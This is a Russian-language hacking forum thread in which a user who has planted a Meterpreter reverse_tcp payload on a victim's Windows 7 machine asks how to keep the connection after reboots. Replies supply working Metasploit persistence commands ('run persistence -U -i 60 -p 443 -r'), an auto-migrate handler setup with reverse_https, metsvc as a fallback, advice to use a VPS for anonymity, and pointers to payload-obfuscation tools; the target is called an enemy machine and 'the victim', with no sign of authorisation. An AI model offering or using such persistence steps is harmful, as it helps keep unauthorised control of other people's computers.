Доброго времени суток! Собственно столкнулся с проблемой - после формирования полезной нагрузки (reverse_tcp) и доставки на целевую машину(Win 7) вбиваю msf->use exploit/multi/handler - установка IP и порта 4444 - и вуаля - сессия установлена! НО! В случае дисконнекта целевой машины (резет/выключение) - сессию получается восстановить только повторным запуском пэйлоуда. Попробовал прицепить бэкдор к разным процессам (migrate) - цепляется но после перезагрузки не создается сессия. Прописал в автозагрузку через реестр - таже петрушка, попробовал сделать через планировщик задач Вин - при запуске системы - не работает, при этом в журнале отображается как отработавшая задача.
Метасплоит стоит на ВДС, целевая тачка - в сети вероятно с динамическим IP, про проброс порта забыл((((
Какие варианты можете посоветовать, чтобы при запуске системы был бэкконнект?
Заранее благодарен

IF_ELSE сказал(а):

Доброго времени суток! Собственно столкнулся с проблемой - после формирования полезной нагрузки (reverse_tcp) и доставки на целевую машину(Win 7) вбиваю msf->use exploit/multi/handler - установка IP и порта 4444 - и вуаля - сессия установлена! НО! В случае дисконнекта целевой машины (резет/выключение) - сессию получается восстановить только повторным запуском пэйлоуда. Попробовал прицепить бэкдор к разным процессам (migrate) - цепляется но после перезагрузки не создается сессия. Прописал в автозагрузку через реестр - таже петрушка, попробовал сделать через планировщик задач Вин - при запуске системы - не работает, при этом в журнале отображается как отработавшая задача.
Метасплоит стоит на ВДС, целевая тачка - в сети вероятно с динамическим IP, про проброс порта забыл((((
Какие варианты можете посоветовать, чтобы при запуске системы был бэкконнект?
Заранее благодарен


Друг, как только сессия появилась на вражеской машине тебе нужно в метерпреторе сделать persistence это спец функция метерпретора что бы не потерять машину(вражескую) машину после дислокации смены IP и конечно же перезагрузки, а лучше сразу прописать в метасплойте автоперсистенс это позволяет твоему трояну сделать все автоматически то есть закрепится в системе навсегда если конечно же его не спалит антивирь так же есть функция миграте но это уже другая история на webware есть замечательная стать про метерпретор рекомендую ее прочитать а так же плотно изучить все его функции!

Я пробовал persistence на виртуалке, попробую на целевой тачке...Чет вылетело из головы. Спс за подсказку
Так пойдет - meterpreter >run persistence –A –L c:\\ -X 30 –p 443 –r 192.168.1.113?
После ключа L указывать место расположение бэкдора в системе?

IF_ELSE сказал(а):

Я пробовал persistence на виртуалке, попробую на целевой тачке...Чет вылетело из головы. Спс за подсказку


и еще важный момент который я упусти у тебя должен быть постоянный ip либо днс тоесть пользуйся сервисом noip(это проброс портов и т.д.) но я рекомендую использовать VPS! у него есть масса плюсов 1) анонимность 2) постоянный ip , да и много чего..
Поясняю если ты вбил в троян стучать на твой локальный ip который начинается на 192.168........ у тебя будет все работать тольько в локальной(местной) сети но как только жертва от нее уйдет сессии не будет! троян будет отстукивать но кому то другому с таким же адресом..
ПС у меня мечта завлодеть постоянными IP такие как 192.168.1.~ и т.д.))) и ломать ничего не нужно сами все стучатся!)))




IF_ELSE сказал(а):

Я пробовал persistence на виртуалке, попробую на целевой тачке...Чет вылетело из головы. Спс за подсказку
Так пойдет - meterpreter >run persistence –A –L c:\\ -X 30 –p 443 –r 192.168.1.113?
После ключа L указывать место расположение бэкдора в системе?


можно и так run persistence -U -i 60<--(время отстука домой в секундах) -p 443 -r твой IP и смотри чтобы твой роутер не поменял тебе твой же ip

Я образно указал этот адрес) У меня на ВДС со статикой с метасплойтом) Вопрос еще по поводу пути - указывать полный путь до бэкдора? Ща скину скрин с ошибкой(

IF_ELSE сказал(а):

Я образно указал этот адрес) У меня на ВДС со статикой с метасплойтом) Вопрос еще по поводу пути - указывать полный путь до бэкдора? Ща скину скрин с ошибкой(


возможно у жертвы фаервол,тогда миграция или пробуй metsvc сервис!

Вроде получилось

а по пробуй-ка автомиграт и автоперсистенс, а если это не поможет тогда netcat
Automigrate

msf>use exploit/multi/handler

msf>set payload windows/meterpreter/reverse_https

msf>set AutoRunScript post/windows/manage/migrate

msf>set lhost

msf> set lport

msf>exploit

этот пост тоже почитай пригодится!

Блин - при запуске Venom вылезла ошибка
Как ее победить?

Буду признателен за любые мысли

https://forum.antichat.xyz/attachments/4779321/img_52a037135a.png

а вы из под sudo запустили если да то это ruby дурит голову.... обновите ОС если проблема не решилась велкам))

Спасибо) С судо не прокатило - решил делать нагрузку на виртуалке - а отстук - на вдс, пока проблема не решена. Буду думать.
Читал вашу статью про тотальное заражение сети - есть вопрос по shellter - он работает тока под вин? Может он есть на гитхабе или где его взять под Кали? Из репозиториев не получилось установить - пишет нет такого пакета

shellter здесь работает на кали с вайном и странно что он у Вас не установился.. из репозиториев

спрошу тут,чтобы не плодить новые темы: как через MP добавить запись в реестр ? Если верить хелпу, с ключом createkey мы добавляем путь, а с ключом -t значение. Путь вроде добавляется,а вот значение никак не могу добавить

Можно так
How to make a persistent backdoor (Metasploit / Kali Linux)